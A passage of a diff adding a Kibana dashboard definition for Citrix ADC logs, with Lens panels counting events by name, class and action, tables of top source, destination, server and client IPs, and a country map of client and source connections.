"logs-*", + "name": "indexpattern-datasource-layer-56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "244824be-e6fc-4121-8159-e2a4e11c0a2a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "56ec7bd9-8eff-4c45-86fb-96ff48db7730": { + "columnOrder": [ + "53ea2f90-830c-4e95-92cc-4af2de30cc28", + "69b6dfee-4f72-4b5e-b52e-bc8379433b25" + ], + "columns": { + "53ea2f90-830c-4e95-92cc-4af2de30cc28": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Name", + "operationType": "terms", + "params": { + "accuracyMode": true, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "69b6dfee-4f72-4b5e-b52e-bc8379433b25", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "citrix.name" + }, + "69b6dfee-4f72-4b5e-b52e-bc8379433b25": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "244824be-e6fc-4121-8159-e2a4e11c0a2a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "69b6dfee-4f72-4b5e-b52e-bc8379433b25" + ], + "layerId": "56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "53ea2f90-830c-4e95-92cc-4af2de30cc28" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e89299e1-4cd9-49ef-89e8-3864d1224469", + "w": 24, + "x": 0, + "y": 92 + }, + "panelIndex": "e89299e1-4cd9-49ef-89e8-3864d1224469", + "title": "Events by Event Name [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8e92059b-9b18-4b02-b102-bef8a1787d78", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "56ec7bd9-8eff-4c45-86fb-96ff48db7730": { + "columnOrder": [ + "53ea2f90-830c-4e95-92cc-4af2de30cc28", + "69b6dfee-4f72-4b5e-b52e-bc8379433b25" + ], + "columns": { + "53ea2f90-830c-4e95-92cc-4af2de30cc28": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Class ", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "69b6dfee-4f72-4b5e-b52e-bc8379433b25", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "citrix.device_event_class_id" + }, + "69b6dfee-4f72-4b5e-b52e-bc8379433b25": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "8e92059b-9b18-4b02-b102-bef8a1787d78", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "69b6dfee-4f72-4b5e-b52e-bc8379433b25" + ], + "layerId": "56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "53ea2f90-830c-4e95-92cc-4af2de30cc28" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "d9220f99-2e6e-4c43-b55a-54cb8b3cb55f", + "w": 24, + "x": 24, + "y": 92 + }, + "panelIndex": "d9220f99-2e6e-4c43-b55a-54cb8b3cb55f", + "title": "Events by Event Class [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1d2c9c58-fe87-46cd-943e-90fb37a18c6e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1d0d4d94-f9bb-4246-aa05-c02d3a7d23ec", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1d2c9c58-fe87-46cd-943e-90fb37a18c6e": { + "columnOrder": [ + "7fb3a823-c45d-433b-8763-c38c7944cb79", + "a7ba9e4e-58b8-4177-a16c-6c5e225bd2cf" + ], + "columns": { + "7fb3a823-c45d-433b-8763-c38c7944cb79": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a7ba9e4e-58b8-4177-a16c-6c5e225bd2cf", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "a7ba9e4e-58b8-4177-a16c-6c5e225bd2cf": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "1d0d4d94-f9bb-4246-aa05-c02d3a7d23ec", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a7ba9e4e-58b8-4177-a16c-6c5e225bd2cf" + ], + "layerId": "1d2c9c58-fe87-46cd-943e-90fb37a18c6e", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "7fb3a823-c45d-433b-8763-c38c7944cb79" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a02365ac-b2de-4f1c-a59f-ec763f0634e7", + "w": 24, + "x": 0, + "y": 107 + }, + "panelIndex": "a02365ac-b2de-4f1c-a59f-ec763f0634e7", + "title": "Events by Action [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "baa1a399-bb78-458e-a95e-da29abcb3374", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "35179640-438c-41c3-a0c9-1eb27a1929d9": { + "columnOrder": [ + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca", + "5ad27162-a387-4774-992e-225bd38fcfe7" + ], + "columns": { + "5ad27162-a387-4774-992e-225bd38fcfe7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Source IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "baa1a399-bb78-458e-a95e-da29abcb3374", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca" + }, + { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7" + } + ], + "layerId": "35179640-438c-41c3-a0c9-1eb27a1929d9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "8d5ccace-9260-4464-af7c-6165af68480e", + "w": 24, + "x": 24, + "y": 107 + }, + "panelIndex": "8d5ccace-9260-4464-af7c-6165af68480e", + "title": "Top 10 Source IP [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6cab624e-160d-43ec-8f70-e80787f5d46b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "35179640-438c-41c3-a0c9-1eb27a1929d9": { + "columnOrder": [ + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca", + "5ad27162-a387-4774-992e-225bd38fcfe7" + ], + "columns": { + "5ad27162-a387-4774-992e-225bd38fcfe7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Destination IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "destination.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "6cab624e-160d-43ec-8f70-e80787f5d46b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca" + }, + { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7" + } + ], + "layerId": "35179640-438c-41c3-a0c9-1eb27a1929d9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c5c252e5-add3-46e7-9d63-133881e24666", + "w": 24, + "x": 0, + "y": 122 + }, + "panelIndex": "c5c252e5-add3-46e7-9d63-133881e24666", + "title": "Top 10 Destination IP [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4a5fe18d-b8d0-45d1-9937-9bfe329f4c85", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "35179640-438c-41c3-a0c9-1eb27a1929d9": { + "columnOrder": [ + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca", + "5ad27162-a387-4774-992e-225bd38fcfe7" + ], + "columns": { + "5ad27162-a387-4774-992e-225bd38fcfe7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Server IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "server.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "4a5fe18d-b8d0-45d1-9937-9bfe329f4c85", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca" + }, + { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7" + } + ], + "layerId": "35179640-438c-41c3-a0c9-1eb27a1929d9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c6e8140c-ab76-433a-9309-8bdb471ae311", + "w": 24, + "x": 24, + "y": 122 + }, + "panelIndex": "c6e8140c-ab76-433a-9309-8bdb471ae311", + "title": "Top 10 Server IP [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d8c7fbbb-d7dc-4b07-99ca-c30b4334fdf6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "35179640-438c-41c3-a0c9-1eb27a1929d9": { + "columnOrder": [ + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca", + "5ad27162-a387-4774-992e-225bd38fcfe7" + ], + "columns": { + "5ad27162-a387-4774-992e-225bd38fcfe7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Client IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "client.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d8c7fbbb-d7dc-4b07-99ca-c30b4334fdf6", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d49ceaa7-1a83-411e-a6ea-db0fcbdc46ca" + }, + { + "columnId": "5ad27162-a387-4774-992e-225bd38fcfe7" + } + ], + "layerId": "35179640-438c-41c3-a0c9-1eb27a1929d9", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "26ab28ea-2f8d-4612-92ed-0bc9cf0f56c2", + "w": 24, + "x": 0, + "y": 137 + }, + "panelIndex": "26ab28ea-2f8d-4612-92ed-0bc9cf0f56c2", + "title": "Top 10 Client IP [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "layerListJSON": "[{\"locale\":\"autoselect\",\"sourceDescriptor\":{\"type\":\"EMS_TMS\",\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\"},\"id\":\"5fa2b795-79cb-4d92-baca-6764236a1761\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":1,\"visible\":true,\"style\":{\"type\":\"EMS_VECTOR_TILE\",\"color\":\"\"},\"includeInFitToBounds\":true,\"type\":\"EMS_VECTOR_TILE\"},{\"joins\":[{\"leftField\":\"iso2\",\"right\":{\"type\":\"ES_TERM_SOURCE\",\"id\":\"4d75bc0f-290d-44c9-a3c5-74ecdbc20a06\",\"term\":\"client.geo.country_iso_code\",\"metrics\":[{\"type\":\"count\"}],\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"indexPatternRefName\":\"layer_1_join_0_index_pattern\"}}],\"sourceDescriptor\":{\"type\":\"EMS_FILE\",\"id\":\"world_countries\",\"tooltipProperties\":[\"iso2\"]},\"style\":{\"type\":\"VECTOR\",\"properties\":{\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"fillColor\":{\"type\":\"DYNAMIC\",\"options\":{\"color\":\"Yellow to Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"__kbnjoin__count__4d75bc0f-290d-44c9-a3c5-74ecdbc20a06\",\"origin\":\"join\"},\"fieldMetaOptions\":{\"isEnabled\":true,\"sigma\":3},\"type\":\"ORDINAL\"}},\"lineColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#3d3d3d\"}},\"lineWidth\":{\"type\":\"STATIC\",\"options\":{\"size\":1}},\"iconSize\":{\"type\":\"STATIC\",\"options\":{\"size\":6}},\"iconOrientation\":{\"type\":\"STATIC\",\"options\":{\"orientation\":0}},\"labelText\":{\"type\":\"DYNAMIC\",\"options\":{\"field\":{\"name\":\"__kbnjoin__count__4d75bc0f-290d-44c9-a3c5-74ecdbc20a06\",\"origin\":\"join\"}}},\"labelColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#000000\"}},\"labelSize\":{\"type\":\"STATIC\",\"options\":{\"size\":14}},\"labelZoomRange\":{\"options\":{\"useLayerZoomRange\":true,\"minZoom\":0,\"maxZoom\":24}},\"labelBorderColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#FFFFFF\"}},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelPosition\":{\"options\":{\"position\":\"CENTER\"}}},\"isTimeAware\":true},\"id\":\"eee46f19-a419-4463-ad99-acaa52789e83\",\"label\":\"Client Countries\",\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"includeInFitToBounds\":true,\"type\":\"GEOJSON_VECTOR\",\"disableTooltips\":false},{\"joins\":[{\"leftField\":\"iso2\",\"right\":{\"type\":\"ES_TERM_SOURCE\",\"id\":\"01cee178-3bd9-42d4-b558-abfd4e64f87a\",\"term\":\"source.geo.country_iso_code\",\"metrics\":[{\"type\":\"count\"}],\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"indexPatternRefName\":\"layer_2_join_0_index_pattern\"}}],\"sourceDescriptor\":{\"type\":\"EMS_FILE\",\"id\":\"world_countries\",\"tooltipProperties\":[\"iso2\"]},\"style\":{\"type\":\"VECTOR\",\"properties\":{\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"fillColor\":{\"type\":\"DYNAMIC\",\"options\":{\"color\":\"Yellow to Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"__kbnjoin__count__01cee178-3bd9-42d4-b558-abfd4e64f87a\",\"origin\":\"join\"},\"fieldMetaOptions\":{\"isEnabled\":true,\"sigma\":3},\"type\":\"ORDINAL\"}},\"lineColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#3d3d3d\"}},\"lineWidth\":{\"type\":\"STATIC\",\"options\":{\"size\":1}},\"iconSize\":{\"type\":\"STATIC\",\"options\":{\"size\":6}},\"iconOrientation\":{\"type\":\"STATIC\",\"options\":{\"orientation\":0}},\"labelText\":{\"type\":\"DYNAMIC\",\"options\":{\"field\":{\"name\":\"__kbnjoin__count__01cee178-3bd9-42d4-b558-abfd4e64f87a\",\"origin\":\"join\"}}},\"labelColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#000000\"}},\"labelSize\":{\"type\":\"STATIC\",\"options\":{\"size\":14}},\"labelZoomRange\":{\"options\":{\"useLayerZoomRange\":true,\"minZoom\":0,\"maxZoom\":24}},\"labelBorderColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#FFFFFF\"}},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelPosition\":{\"options\":{\"position\":\"CENTER\"}}},\"isTimeAware\":true},\"id\":\"58d98668-4206-42c5-99d7-58ef15f5b739\",\"label\":\"Source Countries\",\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"includeInFitToBounds\":true,\"type\":\"GEOJSON_VECTOR\",\"disableTooltips\":false}]", + "mapStateJSON": "{\"adHocDataViews\":[],\"zoom\":1.4,\"center\":{\"lon\":0,\"lat\":19.94277},\"timeFilters\":{\"from\":\"now-15y\",\"to\":\"now\"},\"refreshConfig\":{\"isPaused\":true,\"interval\":60000},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[{\"meta\":{\"disabled\":false,\"negate\":false,\"alias\":null,\"index\":\"logs-*\",\"key\":\"data_stream.dataset\",\"field\":\"data_stream.dataset\",\"params\":{\"query\":\"citrix_adc.log\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"citrix_adc.log\"}},\"$state\":{\"store\":\"appState\"}}],\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"customIcons\":[],\"disableInteractive\":false,\"disableTooltipControl\":false,\"hideToolbarOverlay\":false,\"hideLayerControl\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"browserLocation\":{\"zoom\":2},\"keydownScrollZoom\":false,\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"}}", + "title": "", + "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}" + }, + "enhancements": {}, + "hiddenLayers": [], + "hidePanelTitles": false, + "isLayerTOCOpen": false, + "mapBuffer": { + "maxLat": 66.51326, + "maxLon": 180, + "minLat": -66.51326, + "minLon": -180 + }, + "mapCenter": { + "lat": 19.94277, + "lon": 0, + "zoom": 1.4 + }, + "openTOCDetails": [] + }, + "gridData": { + "h": 15, + "i": "164d7357-8f59-4773-a775-fe7faee555de", + "w": 24, + "x": 24, + "y": 137 + }, + "panelIndex": "164d7357-8f59-4773-a775-fe7faee555de", + "title": "Source/Client Connections [Logs Citrix ADC]", + "type": "map", + "version": "8.7.1" + } + ], + "timeRestore": false, + "title": "[Logs Citrix ADC] Overview", + "version": 1 + }, + "coreMigrationVersion": "8.7.1", + "created_at": "2024-03-15T10:48:42.289Z", + "id": "citrix_adc-95709fd0-e130-11ee-adb0-b71252739438", + "migrationVersion": { + "dashboard": "8.7.0" + }, + "references": [ + { + "id": "logs-*", + "name": "f7acb623-11e3-4403-9b9b-fc30630b7449:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f7acb623-11e3-4403-9b9b-fc30630b7449:a4952cfd-1931-44ff-a055-45881e87fbf9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e9be0e0-4605-4e82-89e2-d18942be9929:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e9be0e0-4605-4e82-89e2-d18942be9929:45a5b385-2216-447e-b0cd-f480a8a4c212", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ed9aa7e1-608b-4b65-8f0f-b64432678cd2:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ed9aa7e1-608b-4b65-8f0f-b64432678cd2:57891f44-e3cc-4c13-a561-98af9b658060", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2dfcb670-693f-4f10-9717-e4056e66a4f1:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2dfcb670-693f-4f10-9717-e4056e66a4f1:a67fd70d-3451-43ad-8947-9549dde00283", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 